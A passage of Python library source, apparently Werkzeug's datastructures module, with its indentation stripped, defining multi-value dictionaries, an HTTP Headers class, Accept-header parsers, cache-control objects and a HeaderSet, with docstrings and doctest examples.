>>> zip(d.keys(), d.listvalues()) == d.lists()
True
"""
return itervalues(dict, self)
def copy(self):
"""Return a shallow copy of this object."""
return self.__class__(self)
def deepcopy(self, memo=None):
"""Return a deep copy of this object."""
return self.__class__(deepcopy(self.to_dict(flat=False), memo))
def to_dict(self, flat=True):
"""Return the contents as regular dict. If `flat` is `True` the
returned dict will only have the first item present, if `flat` is
`False` all values will be returned as lists.
:param flat: If set to `False` the dict returned will have lists
with all the values in it. Otherwise it will only
contain the first value for each key.
:return: a :class:`dict`
"""
if flat:
return dict(iteritems(self))
return dict(self.lists())
def update(self, other_dict):
"""update() extends rather than replaces existing key lists."""
for key, value in iter_multi_items(other_dict):
MultiDict.add(self, key, value)
def pop(self, key, default=_missing):
"""Pop the first item for a list on the dict. Afterwards the
key is removed from the dict, so additional values are discarded:
>>> d = MultiDict({"foo": [1, 2, 3]})
>>> d.pop("foo")
1
>>> "foo" in d
False
:param key: the key to pop.
:param default: if provided the value to return if the key was
not in the dictionary.
"""
try:
return dict.pop(self, key)[0]
except KeyError as e:
if default is not _missing:
return default
raise exceptions.BadRequestKeyError(str(e))
def popitem(self):
"""Pop an item from the dict."""
try:
item = dict.popitem(self)
return (item[0], item[1][0])
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
def poplist(self, key):
"""Pop the list for a key from the dict. If the key is not in the dict
an empty list is returned.
.. versionchanged:: 0.5
If the key does no longer exist a list is returned instead of
raising an error.
"""
return dict.pop(self, key, [])
def popitemlist(self):
"""Pop a ``(key, list)`` tuple from the dict."""
try:
return dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
def __copy__(self):
return self.copy()
def __deepcopy__(self, memo):
return self.deepcopy(memo=memo)
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, list(iteritems(self, multi=True)))
class _omd_bucket(object):
"""Wraps values in the :class:`OrderedMultiDict`. This makes it
possible to keep an order over multiple different keys. It requires
a lot of extra memory and slows down access a lot, but makes it
possible to access elements in O(1) and iterate in O(n).
"""
__slots__ = ('prev', 'key', 'value', 'next')
def __init__(self, omd, key, value):
self.prev = omd._last_bucket
self.key = key
self.value = value
self.next = None
if omd._first_bucket is None:
omd._first_bucket = self
if omd._last_bucket is not None:
omd._last_bucket.next = self
omd._last_bucket = self
def unlink(self, omd):
if self.prev:
self.prev.next = self.next
if self.next:
self.next.prev = self.prev
if omd._first_bucket is self:
omd._first_bucket = self.next
if omd._last_bucket is self:
omd._last_bucket = self.prev
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class OrderedMultiDict(MultiDict):
"""Works like a regular :class:`MultiDict` but preserves the
order of the fields. To convert the ordered multi dict into a
list you can use the :meth:`items` method and pass it ``multi=True``.
In general an :class:`OrderedMultiDict` is an order of magnitude
slower than a :class:`MultiDict`.
.. admonition:: note
Due to a limitation in Python you cannot convert an ordered
multi dict into a regular dict by using ``dict(multidict)``.
Instead you have to use the :meth:`to_dict` method, otherwise
the internal bucket objects are exposed.
"""
def __init__(self, mapping=None):
dict.__init__(self)
self._first_bucket = self._last_bucket = None
if mapping is not None:
OrderedMultiDict.update(self, mapping)
def __eq__(self, other):
if not isinstance(other, MultiDict):
return NotImplemented
if isinstance(other, OrderedMultiDict):
iter1 = iteritems(self, multi=True)
iter2 = iteritems(other, multi=True)
try:
for k1, v1 in iter1:
k2, v2 = next(iter2)
if k1 != k2 or v1 != v2:
return False
except StopIteration:
return False
try:
next(iter2)
except StopIteration:
return True
return False
if len(self) != len(other):
return False
for key, values in iterlists(self):
if other.getlist(key) != values:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __reduce_ex__(self, protocol):
return type(self), (list(iteritems(self, multi=True)),)
def __getstate__(self):
return list(iteritems(self, multi=True))
def __setstate__(self, values):
dict.clear(self)
for key, value in values:
self.add(key, value)
def __getitem__(self, key):
if key in self:
return dict.__getitem__(self, key)[0].value
raise exceptions.BadRequestKeyError(key)
def __setitem__(self, key, value):
self.poplist(key)
self.add(key, value)
def __delitem__(self, key):
self.pop(key)
def keys(self):
return (key for key, value in iteritems(self))
__iter__ = keys
def values(self):
return (value for key, value in iteritems(self))
def items(self, multi=False):
ptr = self._first_bucket
if multi:
while ptr is not None:
yield ptr.key, ptr.value
ptr = ptr.next
else:
returned_keys = set()
while ptr is not None:
if ptr.key not in returned_keys:
returned_keys.add(ptr.key)
yield ptr.key, ptr.value
ptr = ptr.next
def lists(self):
returned_keys = set()
ptr = self._first_bucket
while ptr is not None:
if ptr.key not in returned_keys:
yield ptr.key, self.getlist(ptr.key)
returned_keys.add(ptr.key)
ptr = ptr.next
def listvalues(self):
for key, values in iterlists(self):
yield values
def add(self, key, value):
dict.setdefault(self, key, []).append(_omd_bucket(self, key, value))
def getlist(self, key, type=None):
try:
rv = dict.__getitem__(self, key)
except KeyError:
return []
if type is None:
return [x.value for x in rv]
result = []
for item in rv:
try:
result.append(type(item.value))
except ValueError:
pass
return result
def setlist(self, key, new_list):
self.poplist(key)
for value in new_list:
self.add(key, value)
def setlistdefault(self, key, default_list=None):
raise TypeError('setlistdefault is unsupported for '
'ordered multi dicts')
def update(self, mapping):
for key, value in iter_multi_items(mapping):
OrderedMultiDict.add(self, key, value)
def poplist(self, key):
buckets = dict.pop(self, key, ())
for bucket in buckets:
bucket.unlink(self)
return [x.value for x in buckets]
def pop(self, key, default=_missing):
try:
buckets = dict.pop(self, key)
except KeyError as e:
if default is not _missing:
return default
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return buckets[0].value
def popitem(self):
try:
key, buckets = dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return key, buckets[0].value
def popitemlist(self):
try:
key, buckets = dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return key, [x.value for x in buckets]
def _options_header_vkw(value, kw):
return dump_options_header(value, dict((k.replace('_', '-'), v)
for k, v in kw.items()))
def _unicodify_header_value(value):
if isinstance(value, bytes):
value = value.decode('latin-1')
if not isinstance(value, text_type):
value = text_type(value)
return value
@native_itermethods(['keys', 'values', 'items'])
class Headers(object):
"""An object that stores some headers. It has a dict-like interface
but is ordered and can store the same keys multiple times.
This data structure is useful if you want a nicer way to handle WSGI
headers which are stored as tuples in a list.
From Werkzeug 0.3 onwards, the :exc:`KeyError` raised by this class is
also a subclass of the :class:`~exceptions.BadRequest` HTTP exception
and will render a page for a ``400 BAD REQUEST`` if caught in a
catch-all for HTTP exceptions.
Headers is mostly compatible with the Python :class:`wsgiref.headers.Headers`
class, with the exception of `__getitem__`. :mod:`wsgiref` will return
`None` for ``headers['missing']``, whereas :class:`Headers` will raise
a :class:`KeyError`.
To create a new :class:`Headers` object pass it a list or dict of headers
which are used as default values. This does not reuse the list passed
to the constructor for internal usage.
:param defaults: The list of default values for the :class:`Headers`.
.. versionchanged:: 0.9
This data structure now stores unicode values similar to how the
multi dicts do it. The main difference is that bytes can be set as
well which will automatically be latin1 decoded.
.. versionchanged:: 0.9
The :meth:`linked` function was removed without replacement as it
was an API that does not support the changes to the encoding model.
"""
def __init__(self, defaults=None):
self._list = []
if defaults is not None:
if isinstance(defaults, (list, Headers)):
self._list.extend(defaults)
else:
self.extend(defaults)
def __getitem__(self, key, _get_mode=False):
if not _get_mode:
if isinstance(key, integer_types):
return self._list[key]
elif isinstance(key, slice):
return self.__class__(self._list[key])
if not isinstance(key, string_types):
raise exceptions.BadRequestKeyError(key)
ikey = key.lower()
for k, v in self._list:
if k.lower() == ikey:
return v
# micro optimization: if we are in get mode we will catch that
# exception one stack level down so we can raise a standard
# key error instead of our special one.
if _get_mode:
raise KeyError()
raise exceptions.BadRequestKeyError(key)
def __eq__(self, other):
return other.__class__ is self.__class__ and \
set(other._list) == set(self._list)
def __ne__(self, other):
return not self.__eq__(other)
def get(self, key, default=None, type=None, as_bytes=False):
"""Return the default value if the requested data doesn't exist.
If `type` is provided and is a callable it should convert the value,
return it or raise a :exc:`ValueError` if that is not possible. In
this case the function will return the default as if the value was not
found:
>>> d = Headers([('Content-Length', '42')])
>>> d.get('Content-Length', type=int)
42
If a headers object is bound you must not add unicode strings
because no encoding takes place.
.. versionadded:: 0.9
Added support for `as_bytes`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key can't
be looked up. If not further specified `None` is
returned.
:param type: A callable that is used to cast the value in the
:class:`Headers`. If a :exc:`ValueError` is raised
by this callable the default value is returned.
:param as_bytes: return bytes instead of unicode strings.
"""
try:
rv = self.__getitem__(key, _get_mode=True)
except KeyError:
return default
if as_bytes:
rv = rv.encode('latin1')
if type is None:
return rv
try:
return type(rv)
except ValueError:
return default
def getlist(self, key, type=None, as_bytes=False):
"""Return the list of items for a given key. If that key is not in the
:class:`Headers`, the return value will be an empty list. Just as
:meth:`get` :meth:`getlist` accepts a `type` parameter. All items will
be converted with the callable defined there.
.. versionadded:: 0.9
Added support for `as_bytes`.
:param key: The key to be looked up.
:param type: A callable that is used to cast the value in the
:class:`Headers`. If a :exc:`ValueError` is raised
by this callable the value will be removed from the list.
:return: a :class:`list` of all the values for the key.
:param as_bytes: return bytes instead of unicode strings.
"""
ikey = key.lower()
result = []
for k, v in self:
if k.lower() == ikey:
if as_bytes:
v = v.encode('latin1')
if type is not None:
try:
v = type(v)
except ValueError:
continue
result.append(v)
return result
def get_all(self, name):
"""Return a list of all the values for the named field.
This method is compatible with the :mod:`wsgiref`
:meth:`~wsgiref.headers.Headers.get_all` method.
"""
return self.getlist(name)
def items(self, lower=False):
for key, value in self:
if lower:
key = key.lower()
yield key, value
def keys(self, lower=False):
for key, _ in iteritems(self, lower):
yield key
def values(self):
for _, value in iteritems(self):
yield value
def extend(self, iterable):
"""Extend the headers with a dict or an iterable yielding keys and
values.
"""
if isinstance(iterable, dict):
for key, value in iteritems(iterable):
if isinstance(value, (tuple, list)):
for v in value:
self.add(key, v)
else:
self.add(key, value)
else:
for key, value in iterable:
self.add(key, value)
def __delitem__(self, key, _index_operation=True):
if _index_operation and isinstance(key, (integer_types, slice)):
del self._list[key]
return
key = key.lower()
new = []
for k, v in self._list:
if k.lower() != key:
new.append((k, v))
self._list[:] = new
def remove(self, key):
"""Remove a key.
:param key: The key to be removed.
"""
return self.__delitem__(key, _index_operation=False)
def pop(self, key=None, default=_missing):
"""Removes and returns a key or index.
:param key: The key to be popped. If this is an integer the item at
that position is removed, if it's a string the value for
that key is. If the key is omitted or `None` the last
item is removed.
:return: an item.
"""
if key is None:
return self._list.pop()
if isinstance(key, integer_types):
return self._list.pop(key)
try:
rv = self[key]
self.remove(key)
except KeyError:
if default is not _missing:
return default
raise
return rv
def popitem(self):
"""Removes a key or index and returns a (key, value) item."""
return self.pop()
def __contains__(self, key):
"""Check if a key is present."""
try:
self.__getitem__(key, _get_mode=True)
except KeyError:
return False
return True
has_key = __contains__
def __iter__(self):
"""Yield ``(key, value)`` tuples."""
return iter(self._list)
def __len__(self):
return len(self._list)
def add(self, _key, _value, **kw):
"""Add a new header tuple to the list.
Keyword arguments can specify additional parameters for the header
value, with underscores converted to dashes::
>>> d = Headers()
>>> d.add('Content-Type', 'text/plain')
>>> d.add('Content-Disposition', 'attachment', filename='foo.png')
The keyword argument dumping uses :func:`dump_options_header`
behind the scenes.
.. versionadded:: 0.4.1
keyword arguments were added for :mod:`wsgiref` compatibility.
"""
if kw:
_value = _options_header_vkw(_value, kw)
_value = _unicodify_header_value(_value)
self._validate_value(_value)
self._list.append((_key, _value))
def _validate_value(self, value):
if not isinstance(value, text_type):
raise TypeError('Value should be unicode.')
if u'\n' in value or u'\r' in value:
raise ValueError('Detected newline in header value. This is '
'a potential security problem')
def add_header(self, _key, _value, **_kw):
"""Add a new header tuple to the list.
An alias for :meth:`add` for compatibility with the :mod:`wsgiref`
:meth:`~wsgiref.headers.Headers.add_header` method.
"""
self.add(_key, _value, **_kw)
def clear(self):
"""Clears all headers."""
del self._list[:]
def set(self, _key, _value, **kw):
"""Remove all header tuples for `key` and add a new one. The newly
added key either appears at the end of the list if there was no
entry or replaces the first one.
Keyword arguments can specify additional parameters for the header
value, with underscores converted to dashes. See :meth:`add` for
more information.
.. versionchanged:: 0.6.1
:meth:`set` now accepts the same arguments as :meth:`add`.
:param key: The key to be inserted.
:param value: The value to be inserted.
"""
if kw:
_value = _options_header_vkw(_value, kw)
_value = _unicodify_header_value(_value)
self._validate_value(_value)
if not self._list:
self._list.append((_key, _value))
return
listiter = iter(self._list)
ikey = _key.lower()
for idx, (old_key, old_value) in enumerate(listiter):
if old_key.lower() == ikey:
# replace first ocurrence
self._list[idx] = (_key, _value)
break
else:
self._list.append((_key, _value))
return
self._list[idx + 1:] = [t for t in listiter if t[0].lower() != ikey]
def setdefault(self, key, value):
"""Returns the value for the key if it is in the dict, otherwise it
returns `default` and sets that value for `key`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key is not
in the dict. If not further specified it's `None`.
"""
if key in self:
return self[key]
self.set(key, value)
return value
def __setitem__(self, key, value):
"""Like :meth:`set` but also supports index/slice based setting."""
if isinstance(key, (slice, integer_types)):
if isinstance(key, integer_types):
value = [value]
value = [(k, _unicodify_header_value(v)) for (k, v) in value]
[self._validate_value(v) for (k, v) in value]
if isinstance(key, integer_types):
self._list[key] = value[0]
else:
self._list[key] = value
else:
self.set(key, value)
def to_list(self, charset='iso-8859-1'):
"""Convert the headers into a list suitable for WSGI."""
from warnings import warn
warn(DeprecationWarning('Method removed, use to_wsgi_list instead'),
stacklevel=2)
return self.to_wsgi_list()
def to_wsgi_list(self):
"""Convert the headers into a list suitable for WSGI.
The values are byte strings in Python 2 converted to latin1 and unicode
strings in Python 3 for the WSGI server to encode.
:return: list
"""
if PY2:
return [(to_native(k), v.encode('latin1')) for k, v in self]
return list(self)
def copy(self):
return self.__class__(self._list)
def __copy__(self):
return self.copy()
def __str__(self):
"""Returns formatted headers suitable for HTTP transmission."""
strs = []
for key, value in self.to_wsgi_list():
strs.append('%s: %s' % (key, value))
strs.append('\r\n')
return '\r\n'.join(strs)
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
list(self)
)
class ImmutableHeadersMixin(object):
"""Makes a :class:`Headers` immutable. We do not mark them as
hashable though since the only usecase for this datastructure
in Werkzeug is a view on a mutable structure.
.. versionadded:: 0.5
:private:
"""
def __delitem__(self, key):
is_immutable(self)
def __setitem__(self, key, value):
is_immutable(self)
set = __setitem__
def add(self, item):
is_immutable(self)
remove = add_header = add
def extend(self, iterable):
is_immutable(self)
def insert(self, pos, value):
is_immutable(self)
def pop(self, index=-1):
is_immutable(self)
def popitem(self):
is_immutable(self)
def setdefault(self, key, default):
is_immutable(self)
class EnvironHeaders(ImmutableHeadersMixin, Headers):
"""Read only version of the headers from a WSGI environment. This
provides the same interface as `Headers` and is constructed from
a WSGI environment.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for
HTTP exceptions.
"""
def __init__(self, environ):
self.environ = environ
def __eq__(self, other):
return self.environ is other.environ
def __getitem__(self, key, _get_mode=False):
# _get_mode is a no-op for this class as there is no index but
# used because get() calls it.
key = key.upper().replace('-', '_')
if key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
return _unicodify_header_value(self.environ[key])
return _unicodify_header_value(self.environ['HTTP_' + key])
def __len__(self):
# the iter is necessary because otherwise list calls our
# len which would call list again and so forth.
return len(list(iter(self)))
def __iter__(self):
for key, value in iteritems(self.environ):
if key.startswith('HTTP_') and key not in \
('HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH'):
yield (key[5:].replace('_', '-').title(),
_unicodify_header_value(value))
elif key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
yield (key.replace('_', '-').title(),
_unicodify_header_value(value))
def copy(self):
raise TypeError('cannot create %r copies' % self.__class__.__name__)
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class CombinedMultiDict(ImmutableMultiDictMixin, MultiDict):
"""A read only :class:`MultiDict` that you can pass multiple :class:`MultiDict`
instances as sequence and it will combine the return values of all wrapped
dicts:
>>> from werkzeug.datastructures import CombinedMultiDict, MultiDict
>>> post = MultiDict([('foo', 'bar')])
>>> get = MultiDict([('blub', 'blah')])
>>> combined = CombinedMultiDict([get, post])
>>> combined['foo']
'bar'
>>> combined['blub']
'blah'
This works for all read operations and will raise a `TypeError` for
methods that usually change data which isn't possible.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
exceptions.
"""
def __reduce_ex__(self, protocol):
return type(self), (self.dicts,)
def __init__(self, dicts=None):
self.dicts = dicts or []
@classmethod
def fromkeys(cls):
raise TypeError('cannot create %r instances by fromkeys' %
cls.__name__)
def __getitem__(self, key):
for d in self.dicts:
if key in d:
return d[key]
raise exceptions.BadRequestKeyError(key)
def get(self, key, default=None, type=None):
for d in self.dicts:
if key in d:
if type is not None:
try:
return type(d[key])
except ValueError:
continue
return d[key]
return default
def getlist(self, key, type=None):
rv = []
for d in self.dicts:
rv.extend(d.getlist(key, type))
return rv
def keys(self):
rv = set()
for d in self.dicts:
rv.update(d.keys())
return iter(rv)
__iter__ = keys
def items(self, multi=False):
found = set()
for d in self.dicts:
for key, value in iteritems(d, multi):
if multi:
yield key, value
elif key not in found:
found.add(key)
yield key, value
def values(self):
for key, value in iteritems(self):
yield value
def lists(self):
rv = {}
for d in self.dicts:
for key, values in iterlists(d):
rv.setdefault(key, []).extend(values)
return iteritems(rv)
def listvalues(self):
return (x[1] for x in self.lists())
def copy(self):
"""Return a shallow copy of this object."""
return self.__class__(self.dicts[:])
def to_dict(self, flat=True):
"""Return the contents as regular dict. If `flat` is `True` the
returned dict will only have the first item present, if `flat` is
`False` all values will be returned as lists.
:param flat: If set to `False` the dict returned will have lists
with all the values in it. Otherwise it will only
contain the first item for each key.
:return: a :class:`dict`
"""
rv = {}
for d in reversed(self.dicts):
rv.update(d.to_dict(flat))
return rv
def __len__(self):
return len(self.keys())
def __contains__(self, key):
for d in self.dicts:
if key in d:
return True
return False
has_key = __contains__
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.dicts)
class FileMultiDict(MultiDict):
"""A special :class:`MultiDict` that has convenience methods to add
files to it. This is used for :class:`EnvironBuilder` and generally
useful for unittesting.
.. versionadded:: 0.5
"""
def add_file(self, name, file, filename=None, content_type=None):
"""Adds a new file to the dict. `file` can be a file name or
a :class:`file`-like or a :class:`FileStorage` object.
:param name: the name of the field.
:param file: a filename or :class:`file`-like object
:param filename: an optional filename
:param content_type: an optional content type
"""
if isinstance(file, FileStorage):
value = file
else:
if isinstance(file, string_types):
if filename is None:
filename = file
file = open(file, 'rb')
if filename and content_type is None:
content_type = mimetypes.guess_type(filename)[0] or \
'application/octet-stream'
value = FileStorage(file, filename, name, content_type)
self.add(name, value)
class ImmutableDict(ImmutableDictMixin, dict):
"""An immutable :class:`dict`.
.. versionadded:: 0.5
"""
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
dict.__repr__(self),
)
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return dict(self)
def __copy__(self):
return self
class ImmutableMultiDict(ImmutableMultiDictMixin, MultiDict):
"""An immutable :class:`MultiDict`.
.. versionadded:: 0.5
"""
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return MultiDict(self)
def __copy__(self):
return self
class ImmutableOrderedMultiDict(ImmutableMultiDictMixin, OrderedMultiDict):
"""An immutable :class:`OrderedMultiDict`.
.. versionadded:: 0.6
"""
def _iter_hashitems(self):
return enumerate(iteritems(self, multi=True))
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return OrderedMultiDict(self)
def __copy__(self):
return self
@native_itermethods(['values'])
class Accept(ImmutableList):
"""An :class:`Accept` object is just a list subclass for lists of
``(value, quality)`` tuples. It is automatically sorted by quality.
All :class:`Accept` objects work similar to a list but provide extra
functionality for working with the data. Containment checks are
normalized to the rules of that header:
>>> a = CharsetAccept([('ISO-8859-1', 1), ('utf-8', 0.7)])
>>> a.best
'ISO-8859-1'
>>> 'iso-8859-1' in a
True
>>> 'UTF8' in a
True
>>> 'utf7' in a
False
To get the quality for an item you can use normal item lookup:
>>> print a['utf-8']
0.7
>>> a['utf7']
0
.. versionchanged:: 0.5
:class:`Accept` objects are forced immutable now.
"""
def __init__(self, values=()):
if values is None:
list.__init__(self)
self.provided = False
elif isinstance(values, Accept):
self.provided = values.provided
list.__init__(self, values)
else:
self.provided = True
values = [(a, b) for b, a in values]
values.sort()
values.reverse()
list.__init__(self, [(a, b) for b, a in values])
def _value_matches(self, value, item):
"""Check if a value matches a given accept item."""
return item == '*' or item.lower() == value.lower()
def __getitem__(self, key):
"""Besides index lookup (getting item n) you can also pass it a string
to get the quality for the item. If the item is not in the list, the
returned quality is ``0``.
"""
if isinstance(key, string_types):
return self.quality(key)
return list.__getitem__(self, key)
def quality(self, key):
"""Returns the quality of the key.
.. versionadded:: 0.6
In previous versions you had to use the item-lookup syntax
(eg: ``obj[key]`` instead of ``obj.quality(key)``)
"""
for item, quality in self:
if self._value_matches(key, item):
return quality
return 0
def __contains__(self, value):
for item, quality in self:
if self._value_matches(value, item):
return True
return False
def __repr__(self):
return '%s([%s])' % (
self.__class__.__name__,
', '.join('(%r, %s)' % (x, y) for x, y in self)
)
def index(self, key):
"""Get the position of an entry or raise :exc:`ValueError`.
:param key: The key to be looked up.
.. versionchanged:: 0.5
This used to raise :exc:`IndexError`, which was inconsistent
with the list API.
"""
if isinstance(key, string_types):
for idx, (item, quality) in enumerate(self):
if self._value_matches(key, item):
return idx
raise ValueError(key)
return list.index(self, key)
def find(self, key):
"""Get the position of an entry or return -1.
:param key: The key to be looked up.
"""
try:
return self.index(key)
except ValueError:
return -1
def values(self):
"""Iterate over all values."""
for item in self:
yield item[0]
def to_header(self):
"""Convert the header set into an HTTP header string."""
result = []
for value, quality in self:
if quality != 1:
value = '%s;q=%s' % (value, quality)
result.append(value)
return ','.join(result)
def __str__(self):
return self.to_header()
def best_match(self, matches, default=None):
"""Returns the best match from a list of possible matches based
on the quality of the client. If two items have the same quality,
the one is returned that comes first.
:param matches: a list of matches to check for
:param default: the value that is returned if none match
"""
best_quality = -1
result = default
for server_item in matches:
for client_item, quality in self:
if quality <= best_quality:
break
if self._value_matches(server_item, client_item):
best_quality = quality
result = server_item
return result
@property
def best(self):
"""The best match as value."""
if self:
return self[0][0]
class MIMEAccept(Accept):
"""Like :class:`Accept` but with special methods and behavior for
mimetypes.
"""
def _value_matches(self, value, item):
def _normalize(x):
x = x.lower()
return x == '*' and ('*', '*') or x.split('/', 1)
# this is from the application which is trusted. to avoid developer
# frustration we actually check these for valid values
if '/' not in value:
raise ValueError('invalid mimetype %r' % value)
value_type, value_subtype = _normalize(value)
if value_type == '*' and value_subtype != '*':
raise ValueError('invalid mimetype %r' % value)
if '/' not in item:
return False
item_type, item_subtype = _normalize(item)
if item_type == '*' and item_subtype != '*':
return False
return (
(item_type == item_subtype == '*' or
value_type == value_subtype == '*') or
(item_type == value_type and (item_subtype == '*' or
value_subtype == '*' or
item_subtype == value_subtype))
)
@property
def accept_html(self):
"""True if this object accepts HTML."""
return (
'text/html' in self or
'application/xhtml+xml' in self or
self.accept_xhtml
)
@property
def accept_xhtml(self):
"""True if this object accepts XHTML."""
return (
'application/xhtml+xml' in self or
'application/xml' in self
)
@property
def accept_json(self):
"""True if this object accepts JSON."""
return 'application/json' in self
class LanguageAccept(Accept):
"""Like :class:`Accept` but with normalization for languages."""
def _value_matches(self, value, item):
def _normalize(language):
return _locale_delim_re.split(language.lower())
return item == '*' or _normalize(value) == _normalize(item)
class CharsetAccept(Accept):
"""Like :class:`Accept` but with normalization for charsets."""
def _value_matches(self, value, item):
def _normalize(name):
try:
return codecs.lookup(name).name
except LookupError:
return name.lower()
return item == '*' or _normalize(value) == _normalize(item)
def cache_property(key, empty, type):
"""Return a new property object for a cache header. Useful if you
want to add support for a cache extension in a subclass."""
return property(lambda x: x._get_cache_value(key, empty, type),
lambda x, v: x._set_cache_value(key, v, type),
lambda x: x._del_cache_value(key),
'accessor for %r' % key)
class _CacheControl(UpdateDictMixin, dict):
"""Subclass of a dict that stores values for a Cache-Control header. It
has accessors for all the cache-control directives specified in RFC 2616.
The class does not differentiate between request and response directives.
Because the cache-control directives in the HTTP header use dashes the
python descriptors use underscores for that.
To get a header of the :class:`CacheControl` object again you can convert
the object into a string or call the :meth:`to_header` method. If you plan
to subclass it and add your own items have a look at the sourcecode for
that class.
.. versionchanged:: 0.4
Setting `no_cache` or `private` to boolean `True` will set the implicit
none-value which is ``*``:
>>> cc = ResponseCacheControl()
>>> cc.no_cache = True
>>> cc
<ResponseCacheControl 'no-cache'>
>>> cc.no_cache
'*'
>>> cc.no_cache = None
>>> cc
<ResponseCacheControl ''>
In versions before 0.5 the behavior documented here affected the now
no longer existing `CacheControl` class.
"""
no_cache = cache_property('no-cache', '*', None)
no_store = cache_property('no-store', None, bool)
max_age = cache_property('max-age', -1, int)
no_transform = cache_property('no-transform', None, None)
def __init__(self, values=(), on_update=None):
dict.__init__(self, values or ())
self.on_update = on_update
self.provided = values is not None
def _get_cache_value(self, key, empty, type):
"""Used internally by the accessor properties."""
if type is bool:
return key in self
if key in self:
value = self[key]
if value is None:
return empty
elif type is not None:
try:
value = type(value)
except ValueError:
pass
return value
def _set_cache_value(self, key, value, type):
"""Used internally by the accessor properties."""
if type is bool:
if value:
self[key] = None
else:
self.pop(key, None)
else:
if value is None:
self.pop(key)
elif value is True:
self[key] = None
else:
self[key] = value
def _del_cache_value(self, key):
"""Used internally by the accessor properties."""
if key in self:
del self[key]
def to_header(self):
"""Convert the stored values into a cache control header."""
return dump_header(self)
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.to_header()
)
class RequestCacheControl(ImmutableDictMixin, _CacheControl):
"""A cache control for requests. This is immutable and gives access
to all the request-relevant cache control headers.
To get a header of the :class:`RequestCacheControl` object again you can
convert the object into a string or call the :meth:`to_header` method. If
you plan to subclass it and add your own items have a look at the sourcecode
for that class.
.. versionadded:: 0.5
In previous versions a `CacheControl` class existed that was used
both for request and response.
"""
max_stale = cache_property('max-stale', '*', int)
min_fresh = cache_property('min-fresh', '*', int)
no_transform = cache_property('no-transform', None, None)
only_if_cached = cache_property('only-if-cached', None, bool)
class ResponseCacheControl(_CacheControl):
"""A cache control for responses. Unlike :class:`RequestCacheControl`
this is mutable and gives access to response-relevant cache control
headers.
To get a header of the :class:`ResponseCacheControl` object again you can
convert the object into a string or call the :meth:`to_header` method. If
you plan to subclass it and add your own items have a look at the sourcecode
for that class.
.. versionadded:: 0.5
In previous versions a `CacheControl` class existed that was used
both for request and response.
"""
public = cache_property('public', None, bool)
private = cache_property('private', '*', None)
must_revalidate = cache_property('must-revalidate', None, bool)
proxy_revalidate = cache_property('proxy-revalidate', None, bool)
s_maxage = cache_property('s-maxage', None, None)
# attach cache_property to the _CacheControl as staticmethod
# so that others can reuse it.
_CacheControl.cache_property = staticmethod(cache_property)
class CallbackDict(UpdateDictMixin, dict):
"""A dict that calls a function passed every time something is changed.
The function is passed the dict instance.
"""
def __init__(self, initial=None, on_update=None):
dict.__init__(self, initial or ())
self.on_update = on_update
def __repr__(self):
return '<%s %s>' % (
self.__class__.__name__,
dict.__repr__(self)
)
class HeaderSet(object):
"""Similar to the :class:`ETags` class this implements a set-like structure.
Unlike :class:`ETags` this is case insensitive and used for vary, allow, and
content-language headers.
If not constructed using the :func:`parse_set_header` function the
instantiation works like this:
>>> hs = HeaderSet(['foo', 'bar', 'baz'])
>>> hs
HeaderSet(['foo', 'bar', 'baz'])
"""
def __init__(self, headers=None, on_update=None):
self._headers = list(headers or ())
self._set = set([x.lower() for x in self._headers])
self.on_update = on_update
def add(self, header):
"""Add a new header to the set."""
self.update((header,))
def remove(self, header):
"""Remove a header from the set. This raises an :exc:`KeyError` if the
header is not in the set.
.. versionchanged:: 0.5
In older versions a :exc:`IndexError` was raised instead of a
:exc:`KeyError` if the object was missing.
:param header: the header to be removed.
"""
key = header.lower()
if key not in self._set:
raise KeyError(header)
self._set.remove(key)
for idx, key in enumerate(self._headers):
if key.lower() == header:
del self._headers[idx]
break
if self.on_update is not None:
self.on_update(self)
def update(self, iterable):
"""Add all the headers from the iterable to the set.
:param iterable: updates the set with the items from the iterable.
"""
inserted_any = False
for header in iterable:
key = header.lower()
if key not in self._set:
self._headers.append(header)
self._set.add(key)
inserted_any = True
if inserted_any and self.on_update is not None:
self.on_update(self)
def discard(self, header):
"""Like :meth:`remove` but ignores errors.
:param header: the header to be discarded.
"""
try:
return self.remove(header)
except KeyError:
pass
def find(self, header):
"""Return the index of the header in the set or return -1 if not found.
:param header: the header to be looked up.
"""
header = header.lower()
for idx, item in enumerate(self._headers):
if item.lower() == header:
return idx
return -1
def index(self, header):
"""Return the index of the header in the set or raise an
:exc:`IndexError`.
:param header: the header to be looked up.
"""
rv = self.find(header)
if rv < 0:
raise IndexError(header)
return rv
def clear(self):
"""Clear the set."""
self._set.clear()
del self._headers[:]
if self.on_update is not None:
